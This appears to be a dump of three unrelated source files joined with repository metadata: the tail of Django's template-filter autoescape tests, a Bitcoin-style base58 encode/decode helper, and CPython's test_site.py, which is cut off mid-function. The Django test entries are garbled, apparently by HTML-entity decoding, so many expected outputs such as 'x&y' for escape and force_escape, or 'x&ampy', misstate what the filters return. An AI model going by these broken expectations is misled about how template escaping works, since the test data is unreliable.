'filter-cut06': ('{{ a|cut:";" }} {{ b|cut:";" }}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&ampy"),
# The "escape" filter works the same whether autoescape is on or off,
# but it has no effect on strings already marked as safe.
'filter-escape01': ('{{ a|escape }} {{ b|escape }}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
'filter-escape02': ('{% autoescape off %}{{ a|escape }} {{ b|escape }}{% endautoescape %}', {"a": "x&y", "b": mark_safe("x&y")}, "x&y x&y"),
# It is only applied once, regardless of the number of times it
# appears in a chain.
'filter-escape03': ('{% autoescape off %}{{ a|escape|escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-escape04': ('{{ a|escape|escape }}', {"a": "x&y"}, "x&y"),
# Force_escape is applied immediately. It can be used to provide
# double-escaping, for example.
'filter-force-escape01': ('{% autoescape off %}{{ a|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape02': ('{{ a|force_escape }}', {"a": "x&y"}, "x&y"),
'filter-force-escape03': ('{% autoescape off %}{{ a|force_escape|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&amp;y"),
'filter-force-escape04': ('{{ a|force_escape|force_escape }}', {"a": "x&y"}, "x&amp;y"),
# Because the result of force_escape is "safe", an additional
# escape filter has no effect.
'filter-force-escape05': ('{% autoescape off %}{{ a|force_escape|escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape06': ('{{ a|force_escape|escape }}', {"a": "x&y"}, "x&y"),
'filter-force-escape07': ('{% autoescape off %}{{ a|escape|force_escape }}{% endautoescape %}', {"a": "x&y"}, "x&y"),
'filter-force-escape08': ('{{ a|escape|force_escape }}', {"a": "x&y"}, "x&y"),
# The contents in "linebreaks" and "linebreaksbr" are escaped
# according to the current autoescape setting.
'filter-linebreaks01': ('{{ a|linebreaks }} {{ b|linebreaks }}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "<p>x&<br />y</p> <p>x&<br />y</p>"),
'filter-linebreaks02': ('{% autoescape off %}{{ a|linebreaks }} {{ b|linebreaks }}{% endautoescape %}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "<p>x&<br />y</p> <p>x&<br />y</p>"),
'filter-linebreaksbr01': ('{{ a|linebreaksbr }} {{ b|linebreaksbr }}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "x&<br />y x&<br />y"),
'filter-linebreaksbr02': ('{% autoescape off %}{{ a|linebreaksbr }} {{ b|linebreaksbr }}{% endautoescape %}', {"a": "x&\ny", "b": mark_safe("x&\ny")}, "x&<br />y x&<br />y"),
'filter-safe01': ("{{ a }} -- {{ a|safe }}", {"a": "<b>hello</b>"}, "<b>hello</b> -- <b>hello</b>"),
'filter-safe02': ("{% autoescape off %}{{ a }} -- {{ a|safe }}{% endautoescape %}", {"a": "<b>hello</b>"}, "<b>hello</b> -- <b>hello</b>"),
'filter-safeseq01': ('{{ a|join:", " }} -- {{ a|safeseq|join:", " }}', {"a": ["&", "<"]}, "&, < -- &, <"),
'filter-safeseq02': ('{% autoescape off %}{{ a|join:", " }} -- {{ a|safeseq|join:", " }}{% endautoescape %}', {"a": ["&", "<"]}, "&, < -- &, <"),
'filter-removetags01': ('{{ a|removetags:"a b" }} {{ b|removetags:"a b" }}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x <p>y</p> x <p>y</p>"),
'filter-removetags02': ('{% autoescape off %}{{ a|removetags:"a b" }} {{ b|removetags:"a b" }}{% endautoescape %}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x <p>y</p> x <p>y</p>"),
'filter-striptags01': ('{{ a|striptags }} {{ b|striptags }}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x y x y"),
'filter-striptags02': ('{% autoescape off %}{{ a|striptags }} {{ b|striptags }}{% endautoescape %}', {"a": "<a>x</a> <p><b>y</b></p>", "b": mark_safe("<a>x</a> <p><b>y</b></p>")}, "x y x y"),
'filter-first01': ('{{ a|first }} {{ b|first }}', {"a": ["a&b", "x"], "b": [mark_safe("a&b"), "x"]}, "a&b a&b"),
'filter-first02': ('{% autoescape off %}{{ a|first }} {{ b|first }}{% endautoescape %}', {"a": ["a&b", "x"], "b": [mark_safe("a&b"), "x"]}, "a&b a&b"),
'filter-last01': ('{{ a|last }} {{ b|last }}', {"a": ["x", "a&b"], "b": ["x", mark_safe("a&b")]}, "a&b a&b"),
'filter-last02': ('{% autoescape off %}{{ a|last }} {{ b|last }}{% endautoescape %}', {"a": ["x", "a&b"], "b": ["x", mark_safe("a&b")]}, "a&b a&b"),
'filter-random01': ('{{ a|random }} {{ b|random }}', {"a": ["a&b", "a&b"], "b": [mark_safe("a&b"), mark_safe("a&b")]}, "a&b a&b"),
'filter-random02': ('{% autoescape off %}{{ a|random }} {{ b|random }}{% endautoescape %}', {"a": ["a&b", "a&b"], "b": [mark_safe("a&b"), mark_safe("a&b")]}, "a&b a&b"),
'filter-slice01': ('{{ a|slice:"1:3" }} {{ b|slice:"1:3" }}', {"a": "a&b", "b": mark_safe("a&b")}, "&b &b"),
'filter-slice02': ('{% autoescape off %}{{ a|slice:"1:3" }} {{ b|slice:"1:3" }}{% endautoescape %}', {"a": "a&b", "b": mark_safe("a&b")}, "&b &b"),
'filter-unordered_list01': ('{{ a|unordered_list }}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list02': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list03': ('{{ a|unordered_list }}', {"a": ["x>", [[mark_safe("<y"), []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list04': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [[mark_safe("<y"), []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
'filter-unordered_list05': ('{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}', {"a": ["x>", [["<y", []]]]}, "\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>"),
# Literal string arguments to the default filter are always treated as
# safe strings, regardless of the auto-escaping state.
#
# Note: we have to use {"a": ""} here, otherwise the invalid template
# variable string interferes with the test result.
'filter-default01': ('{{ a|default:"x<" }}', {"a": ""}, "x<"),
'filter-default02': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": ""}, "x<"),
'filter-default03': ('{{ a|default:"x<" }}', {"a": mark_safe("x>")}, "x>"),
'filter-default04': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": mark_safe("x>")}, "x>"),
'filter-default_if_none01': ('{{ a|default:"x<" }}', {"a": None}, "x<"),
'filter-default_if_none02': ('{% autoescape off %}{{ a|default:"x<" }}{% endautoescape %}', {"a": None}, "x<"),
'filter-phone2numeric01': ('{{ a|phone2numeric }} {{ b|phone2numeric }}', {"a": "<1-800-call-me>", "b": mark_safe("<1-800-call-me>") }, "<1-800-2255-63> <1-800-2255-63>"),
'filter-phone2numeric02': ('{% autoescape off %}{{ a|phone2numeric }} {{ b|phone2numeric }}{% endautoescape %}', {"a": "<1-800-call-me>", "b": mark_safe("<1-800-call-me>") }, "<1-800-2255-63> <1-800-2255-63>"),
'filter-phone2numeric03': ('{{ a|phone2numeric }}', {"a": "How razorback-jumping frogs can level six piqued gymnasts!"}, "469 729672225-5867464 37647 226 53835 749 747833 49662787!"),
# Ensure iriencode keeps safe strings:
'filter-iriencode01': ('{{ url|iriencode }}', {'url': '?test=1&me=2'}, '?test=1&me=2'),
'filter-iriencode02': ('{% autoescape off %}{{ url|iriencode }}{% endautoescape %}', {'url': '?test=1&me=2'}, '?test=1&me=2'),
'filter-iriencode03': ('{{ url|iriencode }}', {'url': mark_safe('?test=1&me=2')}, '?test=1&me=2'),
'filter-iriencode04': ('{% autoescape off %}{{ url|iriencode }}{% endautoescape %}', {'url': mark_safe('?test=1&me=2')}, '?test=1&me=2'),
# urlencode
'filter-urlencode01': ('{{ url|urlencode }}', {'url': '/test&"/me?/'}, '/test%26%22/me%3F/'),
'filter-urlencode02': ('/test/{{ urlbit|urlencode:"" }}/', {'urlbit': 'escape/slash'}, '/test/escape%2Fslash/'),
# Chaining a bunch of safeness-preserving filters should not alter
# the safe status either way.
'chaining01': ('{{ a|capfirst|center:"7" }}.{{ b|capfirst|center:"7" }}', {"a": "a < b", "b": mark_safe("a < b")}, " A < b . A < b "),
'chaining02': ('{% autoescape off %}{{ a|capfirst|center:"7" }}.{{ b|capfirst|center:"7" }}{% endautoescape %}', {"a": "a < b", "b": mark_safe("a < b")}, " A < b . A < b "),
# Using a filter that forces a string back to unsafe:
'chaining03': ('{{ a|cut:"b"|capfirst }}.{{ b|cut:"b"|capfirst }}', {"a": "a < b", "b": mark_safe("a < b")}, "A < .A < "),
'chaining04': ('{% autoescape off %}{{ a|cut:"b"|capfirst }}.{{ b|cut:"b"|capfirst }}{% endautoescape %}', {"a": "a < b", "b": mark_safe("a < b")}, "A < .A < "),
# Using a filter that forces safeness does not lead to double-escaping
'chaining05': ('{{ a|escape|capfirst }}', {"a": "a < b"}, "A < b"),
'chaining06': ('{% autoescape off %}{{ a|escape|capfirst }}{% endautoescape %}', {"a": "a < b"}, "A < b"),
# Force to safe, then back (also showing why using force_escape too
# early in a chain can lead to unexpected results).
'chaining07': ('{{ a|force_escape|cut:";" }}', {"a": "a < b"}, "a &lt b"),
'chaining08': ('{% autoescape off %}{{ a|force_escape|cut:";" }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
'chaining09': ('{{ a|cut:";"|force_escape }}', {"a": "a < b"}, "a < b"),
'chaining10': ('{% autoescape off %}{{ a|cut:";"|force_escape }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
'chaining11': ('{{ a|cut:"b"|safe }}', {"a": "a < b"}, "a < "),
'chaining12': ('{% autoescape off %}{{ a|cut:"b"|safe }}{% endautoescape %}', {"a": "a < b"}, "a < "),
'chaining13': ('{{ a|safe|force_escape }}', {"a": "a < b"}, "a < b"),
'chaining14': ('{% autoescape off %}{{ a|safe|force_escape }}{% endautoescape %}', {"a": "a < b"}, "a < b"),
# Filters decorated with stringfilter still respect is_safe.
'autoescape-stringfilter01': (r'{{ unsafe|capfirst }}', {'unsafe': UnsafeClass()}, 'You & me'),
'autoescape-stringfilter02': (r'{% autoescape off %}{{ unsafe|capfirst }}{% endautoescape %}', {'unsafe': UnsafeClass()}, 'You & me'),
'autoescape-stringfilter03': (r'{{ safe|capfirst }}', {'safe': SafeClass()}, 'You > me'),
'autoescape-stringfilter04': (r'{% autoescape off %}{{ safe|capfirst }}{% endautoescape %}', {'safe': SafeClass()}, 'You > me'),
'escapejs01': (r'{{ a|escapejs }}', {'a': 'testing\r\njavascript \'string" <b>escaping</b>'}, 'testing\\u000D\\u000Ajavascript \\u0027string\\u0022 \\u003Cb\\u003Eescaping\\u003C/b\\u003E'),
'escapejs02': (r'{% autoescape off %}{{ a|escapejs }}{% endautoescape %}', {'a': 'testing\r\njavascript \'string" <b>escaping</b>'}, 'testing\\u000D\\u000Ajavascript \\u0027string\\u0022 \\u003Cb\\u003Eescaping\\u003C/b\\u003E'),
# length filter.
'length01': ('{{ list|length }}', {'list': ['4', None, True, {}]}, '4'),
'length02': ('{{ list|length }}', {'list': []}, '0'),
'length03': ('{{ string|length }}', {'string': ''}, '0'),
'length04': ('{{ string|length }}', {'string': 'django'}, '6'),
# Invalid uses that should fail silently.
'length05': ('{{ int|length }}', {'int': 7}, ''),
'length06': ('{{ None|length }}', {'None': None}, ''),
# length_is filter.
'length_is01': ('{% if some_list|length_is:"4" %}Four{% endif %}', {'some_list': ['4', None, True, {}]}, 'Four'),
'length_is02': ('{% if some_list|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'some_list': ['4', None, True, {}, 17]}, 'Not Four'),
'length_is03': ('{% if mystring|length_is:"4" %}Four{% endif %}', {'mystring': 'word'}, 'Four'),
'length_is04': ('{% if mystring|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'mystring': 'Python'}, 'Not Four'),
'length_is05': ('{% if mystring|length_is:"4" %}Four{% else %}Not Four{% endif %}', {'mystring': ''}, 'Not Four'),
'length_is06': ('{% with var|length as my_length %}{{ my_length }}{% endwith %}', {'var': 'django'}, '6'),
# Boolean return value from length_is should not be coerced to a string
'length_is07': (r'{% if "X"|length_is:0 %}Length is 0{% else %}Length not 0{% endif %}', {}, 'Length not 0'),
'length_is08': (r'{% if "X"|length_is:1 %}Length is 1{% else %}Length not 1{% endif %}', {}, 'Length is 1'),
# Invalid uses that should fail silently.
'length_is09': ('{{ var|length_is:"fish" }}', {'var': 'django'}, ''),
'length_is10': ('{{ int|length_is:"1" }}', {'int': 7}, ''),
'length_is11': ('{{ none|length_is:"1" }}', {'none': None}, ''),
'join01': (r'{{ a|join:", " }}', {'a': ['alpha', 'beta & me']}, 'alpha, beta & me'),
'join02': (r'{% autoescape off %}{{ a|join:", " }}{% endautoescape %}', {'a': ['alpha', 'beta & me']}, 'alpha, beta & me'),
'join03': (r'{{ a|join:" & " }}', {'a': ['alpha', 'beta & me']}, 'alpha & beta & me'),
'join04': (r'{% autoescape off %}{{ a|join:" & " }}{% endautoescape %}', {'a': ['alpha', 'beta & me']}, 'alpha & beta & me'),
# Test that joining with unsafe joiners don't result in unsafe strings (#11377)
'join05': (r'{{ a|join:var }}', {'a': ['alpha', 'beta & me'], 'var': ' & '}, 'alpha & beta & me'),
'join06': (r'{{ a|join:var }}', {'a': ['alpha', 'beta & me'], 'var': mark_safe(' & ')}, 'alpha & beta & me'),
'join07': (r'{{ a|join:var|lower }}', {'a': ['Alpha', 'Beta & me'], 'var': ' & ' }, 'alpha & beta & me'),
'join08': (r'{{ a|join:var|lower }}', {'a': ['Alpha', 'Beta & me'], 'var': mark_safe(' & ')}, 'alpha & beta & me'),
'date01': (r'{{ d|date:"m" }}', {'d': datetime(2008, 1, 1)}, '01'),
'date02': (r'{{ d|date }}', {'d': datetime(2008, 1, 1)}, 'Jan. 1, 2008'),
#Ticket 9520: Make sure |date doesn't blow up on non-dates
'date03': (r'{{ d|date:"m" }}', {'d': 'fail_string'}, ''),
# ISO date formats
'date04': (r'{{ d|date:"o" }}', {'d': datetime(2008, 12, 29)}, '2009'),
'date05': (r'{{ d|date:"o" }}', {'d': datetime(2010, 1, 3)}, '2009'),
# Timezone name
'date06': (r'{{ d|date:"e" }}', {'d': datetime(2009, 3, 12, tzinfo=FixedOffset(30))}, '+0030'),
'date07': (r'{{ d|date:"e" }}', {'d': datetime(2009, 3, 12)}, ''),
# Ticket 19370: Make sure |date doesn't blow up on a midnight time object
'date08': (r'{{ t|date:"H:i" }}', {'t': time(0, 1)}, '00:01'),
'date09': (r'{{ t|date:"H:i" }}', {'t': time(0, 0)}, '00:00'),
# Tests for #11687 and #16676
'add01': (r'{{ i|add:"5" }}', {'i': 2000}, '2005'),
'add02': (r'{{ i|add:"napis" }}', {'i': 2000}, ''),
'add03': (r'{{ i|add:16 }}', {'i': 'not_an_int'}, ''),
'add04': (r'{{ i|add:"16" }}', {'i': 'not_an_int'}, 'not_an_int16'),
'add05': (r'{{ l1|add:l2 }}', {'l1': [1, 2], 'l2': [3, 4]}, '[1, 2, 3, 4]'),
'add06': (r'{{ t1|add:t2 }}', {'t1': (3, 4), 't2': (1, 2)}, '(3, 4, 1, 2)'),
'add07': (r'{{ d|add:t }}', {'d': date(2000, 1, 1), 't': timedelta(10)}, 'Jan. 11, 2000'),
}
| bsd-3-clause |
bitmagnet/mehcoin | contrib/testgen/base58.py | 2139 | 2818 | '''
Bitcoin base58 encoding and decoding.
Based on https://bitcointalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes( (n,) )
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length = None):
""" decode v into a string of len bytes
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
h3 = checksum(result[:-4])
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr)!=21: return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/bitcoin/python-base58.git)
assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') is 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
| mit |
ybellavance/python-for-android | python3-alpha/python3-src/Lib/test/test_site.py | 49 | 16063 | """Tests for 'site'.
Tests assume the initial paths in sys.path once the interpreter has begun
executing have not been removed.
"""
import unittest
from test.support import run_unittest, TESTFN, EnvironmentVarGuard
from test.support import captured_stderr
import builtins
import os
import sys
import re
import encodings
import subprocess
import sysconfig
from copy import copy
# Need to make sure to not import 'site' if someone specified ``-S`` at the
# command-line. Detect this by just making sure 'site' has not been imported
# already.
if "site" in sys.modules:
import site
else:
raise unittest.SkipTest("importation of site.py suppressed")
if not os.path.isdir(site.USER_SITE):
# need to add user site directory for tests
os.makedirs(site.USER_SITE)
site.addsitedir(site.USER_SITE)
class HelperFunctionsTests(unittest.TestCase):
"""Tests for helper functions.
"""
def setUp(self):
"""Save a copy of sys.path"""
self.sys_path = sys.path[:]
self.old_base = site.USER_BASE
self.old_site = site.USER_SITE
self.old_prefixes = site.PREFIXES
self.old_vars = copy(sysconfig._CONFIG_VARS)
def tearDown(self):
"""Restore sys.path"""
sys.path[:] = self.sys_path
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
site.PREFIXES = self.old_prefixes
sysconfig._CONFIG_VARS = self.old_vars
def test_makepath(self):
# Test makepath() have an absolute path for its first return value
# and a case-normalized version of the absolute path for its
# second value.
path_parts = ("Beginning", "End")
original_dir = os.path.join(*path_parts)
abs_dir, norm_dir = site.makepath(*path_parts)
self.assertEqual(os.path.abspath(original_dir), abs_dir)
if original_dir == os.path.normcase(original_dir):
self.assertEqual(abs_dir, norm_dir)
else:
self.assertEqual(os.path.normcase(abs_dir), norm_dir)
def test_init_pathinfo(self):
dir_set = site._init_pathinfo()
for entry in [site.makepath(path)[1] for path in sys.path
if path and os.path.isdir(path)]:
self.assertIn(entry, dir_set,
"%s from sys.path not found in set returned "
"by _init_pathinfo(): %s" % (entry, dir_set))
def pth_file_tests(self, pth_file):
"""Contain common code for testing results of reading a .pth file"""
self.assertIn(pth_file.imported, sys.modules,
"%s not in sys.modules" % pth_file.imported)
self.assertIn(site.makepath(pth_file.good_dir_path)[0], sys.path)
self.assertFalse(os.path.exists(pth_file.bad_dir_path))
def test_addpackage(self):
# Make sure addpackage() imports if the line starts with 'import',
# adds directories to sys.path for any line in the file that is not a
# comment or import that is a valid directory name for where the .pth
# file resides; invalid directories are not added
pth_file = PthFile()
pth_file.cleanup(prep=True) # to make sure that nothing is
# pre-existing that shouldn't be
try:
pth_file.create()
site.addpackage(pth_file.base_dir, pth_file.filename, set())
self.pth_file_tests(pth_file)
finally:
pth_file.cleanup()
def make_pth(self, contents, pth_dir='.', pth_name=TESTFN):
# Create a .pth file and return its (abspath, basename).
pth_dir = os.path.abspath(pth_dir)
pth_basename = pth_name + '.pth'
pth_fn = os.path.join(pth_dir, pth_basename)
pth_file = open(pth_fn, 'w', encoding='utf-8')
self.addCleanup(lambda: os.remove(pth_fn))
pth_file.write(contents)
pth_file.close()
return pth_dir, pth_basename
def test_addpackage_import_bad_syntax(self):
# Issue 10642
pth_dir, pth_fn = self.make_pth("import bad)syntax\n")
with captured_stderr() as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegex(err_out.getvalue(), "line 1")
self.assertRegex(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: the previous two should be independent checks so that the
# order doesn't matter. The next three could be a single check
# but my regex foo isn't good enough to write it.
self.assertRegex(err_out.getvalue(), 'Traceback')
self.assertRegex(err_out.getvalue(), r'import bad\)syntax')
self.assertRegex(err_out.getvalue(), 'SyntaxError')
def test_addpackage_import_bad_exec(self):
# Issue 10642
pth_dir, pth_fn = self.make_pth("randompath\nimport nosuchmodule\n")
with captured_stderr() as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegex(err_out.getvalue(), "line 2")
self.assertRegex(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: ditto previous XXX comment.
self.assertRegex(err_out.getvalue(), 'Traceback')
self.assertRegex(err_out.getvalue(), 'ImportError')
@unittest.skipIf(sys.platform == "win32", "Windows does not raise an "
"error for file paths containing null characters")
def test_addpackage_import_bad_pth_file(self):
# Issue 5258
pth_dir, pth_fn = self.make_pth("abc\x00def\n")
with captured_stderr() as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegex(err_out.getvalue(), "line 1")
self.assertRegex(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: ditto previous XXX comment.
self.assertRegex(err_out.getvalue(), 'Traceback')
self.assertRegex(err_out.getvalue(), 'TypeError')
def test_addsitedir(self):
# Same tests for test_addpackage since addsitedir() essentially just
# calls addpackage() for every .pth file in the directory
pth_file = PthFile()
pth_file.cleanup(prep=True) # Make sure that nothing is pre-existing
# that is tested for
try:
pth_file.create()
site.addsitedir(pth_file.base_dir, set())
self.pth_file_tests(pth_file)
finally:
pth_file.cleanup()
def test_s_option(self):
usersite = site.USER_SITE
self.assertIn(usersite, sys.path)
env = os.environ.copy()
rc = subprocess.call([sys.executable, '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 1)
env = os.environ.copy()
rc = subprocess.call([sys.executable, '-s', '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 0)
env = os.environ.copy()
env["PYTHONNOUSERSITE"] = "1"
rc = subprocess.call([sys.executable, '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 0)
env = os.environ.copy()
env["PYTHONUSERBASE"] = "/tmp"
rc = subprocess.call([sys.executable, '-c',
'import sys, site; sys.exit(site.USER_BASE.startswith("/tmp"))'],
env=env)
self.assertEqual(rc, 1)
def test_getuserbase(self):
site.USER_BASE = None
user_base = site.getuserbase()
# the call sets site.USER_BASE
self.assertEqual(site.USER_BASE, user_base)
# let's set PYTHONUSERBASE and see if it uses it
site.USER_BASE = None
import sysconfig
sysconfig._CONFIG_VARS = None
with EnvironmentVarGuard() as environ:
environ['PYTHONUSERBASE'] = 'xoxo'
self.assertTrue(site.getuserbase().startswith('xoxo'),
site.getuserbase())
def test_getusersitepackages(self):
site.USER_SITE = None
site.USER_BASE = None
user_site = site.getusersitepackages()
# the call sets USER_BASE *and* USER_SITE
self.assertEqual(site.USER_SITE, user_site)
self.assertTrue(user_site.startswith(site.USER_BASE), user_site)
def test_getsitepackages(self):
site.PREFIXES = ['xoxo']
dirs = site.getsitepackages()
if sys.platform in ('os2emx', 'riscos'):
self.assertEqual(len(dirs), 1)
wanted = os.path.join('xoxo', 'Lib', 'site-packages')
self.assertEqual(dirs[0], wanted)
elif os.sep == '/':
self.assertEqual(len(dirs), 2)
wanted = os.path.join('xoxo', 'lib', 'python' + sys.version[:3],
'site-packages')
self.assertEqual(dirs[0], wanted)
wanted = os.path.join('xoxo', 'lib', 'site-python')
self.assertEqual(dirs[1], wanted)
else:
self.assertEqual(len(dirs), 2)
self.assertEqual(dirs[0], 'xoxo')
wanted = os.path.join('xoxo', 'lib', 'site-packages')
self.assertEqual(dirs[1], wanted)
# let's try the specific Apple location
if (sys.platform == "darwin" and
sysconfig.get_config_var("PYTHONFRAMEWORK")):
site.PREFIXES = ['Python.framework']
dirs = site.getsitepackages()
self.assertEqual(len(dirs), 3)
wanted = os.path.join('/Library', 'Python', sys.version[:3],
'site-packages')
self.assertEqual(dirs[2], wanted)
class PthFile(object):
"""Helper class for handling testing of .pth files"""
def __init__(self, filename_base=TESTFN, imported="time",
good_dirname="__testdir__", bad_dirname="__bad"):
"""Initialize instance variables"""
self.filename = filename_base + ".pth"
self.base_dir = os.path.abspath('')
self.file_path = os.path.join(self.base_dir, self.filename)
self.imported = imported
self.good_dirname = good_dirname
self.bad_dirname = bad_dirname
self.good_dir_path = os.path.join(self.base_dir, self.good_dirname)
self.bad_dir_path = os.path.join(self.base_dir, self.bad_dirname)
def create(self):
"""Create a .pth file with a comment, blank lines, an ``import
<self.imported>``, a line with self.good_dirname, and a line with
self.bad_dirname.
Creation of the directory for self.good_dir_path (based off of
self.good_dirname) is also performed.
Make sure to call self.cleanup() to undo anything done by this method.
"""
FILE = open(self.file_path, 'w')
try:
print("#import @bad module name", file=FILE)
print("\n", file=FILE)
print("import %s" % self.imported, file=FILE)
print(self.good_dirname, file=FILE)
print(self.bad_dirname, file=FILE)
finally:
FILE.close()
os.mkdir(self.good_dir_path)
def cleanup(self, prep=False):
"""Make sure that the .pth file is deleted, self.imported is not in
sys.modules, and that both self.good_dirname and self.bad_dirname are
not existing directories."""
if os.path.exists(self.file_path):
os.remove(self.file_path)
if prep:
self.imported_module = sys.modules.get(self.imported)
if self.imported_module:
del sys.modules[self.imported]
else:
if self.imported_module:
sys.modules[self.imported] = self.imported_module
if os.path.exists(self.good_dir_path):
os.rmdir(self.good_dir_path)
if os.path.exists(self.bad_dir_path):
os.rmdir(self.bad_dir_path)
class ImportSideEffectTests(unittest.TestCase):
"""Test side-effects from importing 'site'."""
def setUp(self):
"""Make a copy of sys.path"""
self.sys_path = sys.path[:]
def tearDown(self):
"""Restore sys.path"""
sys.path[:] = self.sys_path
def test_abs_paths(self):
# Make sure all imported modules have their __file__ and __cached__
# attributes as absolute paths. Arranging to put the Lib directory on
# PYTHONPATH would cause the os module to have a relative path for
# __file__ if abs_paths() does not get run. sys and builtins (the
# only other modules imported before site.py runs) do not have
# __file__ or __cached__ because they are built-in.
parent = os.path.relpath(os.path.dirname(os.__file__))
env = os.environ.copy()
env['PYTHONPATH'] = parent
code = ('import os, sys',
# use ASCII to avoid locale issues with non-ASCII directories
'os_file = os.__file__.encode("ascii", "backslashreplace")',
r'sys.stdout.buffer.write(os_file + b"\n")',
'os_cached = os.__cached__.encode("ascii", "backslashreplace")',
r'sys.stdout.buffer.write(os_cached + b"\n")')
command = '\n'.join(code)
# First, prove that with -S (no 'import site'), the paths are
# relative.
proc = subprocess.Popen([sys.executable, '-S', '-c', command],
env=env,
stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()
self.assertEqual(proc.returncode, 0)
os__file__, os__cached__ = stdout.splitlines()[:2]
self.assertFalse(os.path.isabs(os__file__))
self.assertFalse(os.path.isabs(os__cached__))
# Now, with 'import site', it works.
proc = subprocess.Popen([sys.executable, '-c', command],
env=env,
stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()
self.assertEqual(proc.returncode, 0)
os__file__, os__cached__ = stdout.splitlines()[:2]
self.assertTrue(os.path.isabs(os__file__))
self.assertTrue(os.path.isabs(os__cached__))
def test_no_duplicate_paths(self):
# No duplicate paths should exist in sys.path
# Handled by removeduppaths()
site.removeduppaths()
seen_paths = set()
for path in sys.path:
self.assertNotIn(path, seen_paths)
seen_paths.add(path)
def test_add_build_dir(self):
# Test that the build directory's Modules directory is used when it
# should be.
# XXX: implement
pass
def test_setting_quit(self):
# 'quit' and 'exit' should be injected into builtins
self.assertTrue(hasattr(builtins, "quit"))
self.assertTrue(hasattr(builtins, "exit"))
def test_setting_copyright(self):
# 'copyright' and 'credits' should be in builtins
self.assertTrue(hasattr(builtins, "copyright"))
self.assertTrue(hasattr(builtins, "credits"))
def test_setting_help(self):
# 'help' should be set in builtins
self.assertTrue(hasattr(builtins, "help"))
def test_aliasing_mbcs(self):
if sys.platform == "win32":
import locale
if locale.getdefaultlocale()[1].startswith('cp'):
for value in encodings.aliases.aliases.values():
if value == "mbcs":
break
else:
